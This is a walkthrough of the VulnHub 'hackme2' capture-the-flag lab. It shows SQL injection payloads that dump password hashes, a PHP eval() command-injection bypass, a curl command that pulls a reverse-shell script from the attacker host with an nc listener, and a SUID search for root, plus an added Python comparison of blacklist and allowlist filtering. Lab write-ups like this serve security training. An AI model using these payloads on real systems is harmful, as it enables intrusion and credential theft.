vulnhub-hackeme2

admin, 2021-11-19 15:04:58

Target description

'hackme2' is a medium difficulty level box. This is the second part of the hackme series where more controls are in place to deter malicious attacks. In addition, you will have to think out of the box to exploit the vulnerabilities. The goal is to gain limited privilege access via web vulnerabilities and subsequently, privilege escalate as a root user. The lab was created to mimic real world web vulnerabilities.

'hackme2' uses DHCP and in the possible event that the mysqld shuts down on its own (very rare cases), attempt to force restart the machine and it should be working fine subsequently.

Download: https://www.vulnhub.com/entry/hackme-2,618/

*Checklist*

  • Information gathering
  • netdiscover
  • nmap
  • SQL injection
  • fuzzing
  • command execution
  • privilege escalation
  • SUID backdoor file

Information gathering

*Target IP*


*Port scan*

nmap -A -p- 192.168.31.184

Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
|   256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_  256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Penetration testing

SQL injection

*payload*

'union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/#

Result:
books,users 2 3 SGD

'union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_schema=database()#

Result:
id,bookname,price,id,user,pasword,name,address 2 3 SGD

'union/**/select/**/group_concat(user,pasword),2,3/**/from/**/users#

The returned data contains the user superadmin together with its password hash.


*Cracking the password hash*

https://crackstation.net/


Getting a shell

After logging in, the file upload feature was tested first.

It only accepts image files, and the uploaded files cannot be reached afterwards.


Compared with hackme1, there is an additional form below the upload feature.

*Fuzzing*

Next, the form parameters are fuzzed with Burp.


Fuzz the parameters fname and lname.

Wordlist: Fuzzing - full

*Fuzzing results*


When **id** is submitted as the value, the response contains the output of the executed command.

Fname: s
Lname: `cat<welcomeadmin.php`

This returns the page's source code.

Reviewing the source code

<?php
  $fname = $_POST["fname"];
  $lname = $_POST["lname"];
  // Blacklist filter: only semicolons and whitespace are removed from the last name
  $lname = preg_replace('/[;\s]/', '', $lname);
  if($fname=="" || $fname==" " || $lname=="" || $lname==" "){
    echo "You have to search with both First and Last name";
  }else{
    echo "The system is checking the backend for user: ".$fname." ".$lname." ";
    echo "</br>";
    echo "</br>";
    echo "User ". $fname. " ";
    // User-controlled $lname is concatenated into PHP source and evaluated,
    // so backticks or a function call in it run on the server
    eval("echo ".$lname.";");
    echo " cannot be found";
  }
?>

$lname is passed straight into eval(), so it gives command execution; the filter only removes semicolons and whitespace, which is why `cat<welcomeadmin.php` (no space) and ${IFS} (shell-side whitespace) still work.
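The following is an added example, not code from the walkthrough or from the hackme2 box, that replays the page's own inputs through the blacklist filter from welcomeadmin.php and compares it with an allowlist check a defender would use instead. The SQL injection payload is included on the assumption that the search field had a similar space-stripping filter (which is why the page's payload uses /**/); the token list and the name pattern are my own choices.

```python
import re

# The filter from the page: preg_replace('/[;\s]/', '', $lname)
PAGE_FILTER = re.compile(r"[;\s]")
# Allowlist alternative (assumed policy): letters, apostrophe, hyphen, max 64 chars
ALLOWED_NAME = re.compile(r"[A-Za-z][A-Za-z'-]{0,63}")

# Constructed samples: one benign name plus the inputs the walkthrough sends
SAMPLE_INPUTS = {
    "benign": "Smith",
    "backtick_rce": "`cat<welcomeadmin.php`",
    "system_rce": ";system('curl${IFS}http://192.168.31.171/shell.php${IFS}-o${IFS}shell.php');",
    "sqli_union": "'union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables#",
}


def blacklist_filter(value: str) -> str:
    """Reproduce the page's filter: strip semicolons and whitespace, nothing else."""
    return PAGE_FILTER.sub("", value)


def still_dangerous(filtered: str) -> bool:
    """Tokens that keep eval()/shell/SQL working after the blacklist ran:
    backticks, a function call, comment-as-whitespace, IFS expansion, redirection."""
    return any(tok in filtered for tok in ("`", "system(", "/**/", "${IFS}", "<"))


def allowlist_accepts(value: str) -> bool:
    """Positive validation: accept only what a surname can legitimately contain."""
    return ALLOWED_NAME.fullmatch(value) is not None


def evaluate(inputs=SAMPLE_INPUTS) -> dict:
    """Report, per input, whether it survives the blacklist with its payload intact
    and whether the allowlist would have accepted it at all."""
    report = {}
    for label, raw in inputs.items():
        filtered = blacklist_filter(raw)
        report[label] = {
            "blacklist_bypassed": still_dangerous(filtered),
            "allowlist_accepts": allowlist_accepts(raw),
        }
    return report


if __name__ == "__main__":
    for label, r in evaluate().items():
        print(f"{label:13} blacklist_bypassed={r['blacklist_bypassed']!s:5} allowlist_accepts={r['allowlist_accepts']}")
```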

Obtaining a shell

cp /usr/share/webshells/php/php-reverse-shell.php shell.php

python3 -m http.server 80

Submit as lname:
;system('curl${IFS}http://192.168.31.171/shell.php${IFS}-o${IFS}shell.php');

nc -lvp 1234

Request shell.php in the browser.

A reverse shell connects back.


Getting root

find / -user root -perm -4000 -print 2>/dev/null


*Root obtained via the SUID binary found above*


Source: https://cn-sec.com/archives/632602.html